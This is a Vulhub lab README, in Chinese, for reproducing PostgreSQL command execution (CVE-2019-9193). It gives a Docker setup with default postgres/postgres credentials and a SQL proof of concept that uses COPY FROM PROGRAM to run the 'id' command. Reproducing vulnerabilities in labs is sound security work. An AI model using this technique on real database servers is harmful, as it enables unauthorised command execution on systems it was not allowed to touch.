Aaron
63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
975 B
975 B
PostgreSQL 高权限命令执行漏洞(CVE-2019-9193)
PostgreSQL 是一个功能强大的开源关系型数据库系统。在9.3到11版本中存在一处"特性",管理员或具有"COPY TO/FROM PROGRAM"权限的用户,可以使用这个特性执行任意系统命令。
参考链接:
环境搭建
执行以下命令启动存在漏洞的 PostgreSQL 10.7 服务器:
docker compose up -d
服务器将在默认的PostgreSQL端口5432上启动并监听,默认账号密码为postgres/postgres。
漏洞复现
首先连接到PostgreSQL服务器,并执行以下验证概念(POC):
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;
FROM PROGRAM语句将执行id命令并将结果保存在cmd_exec表中:
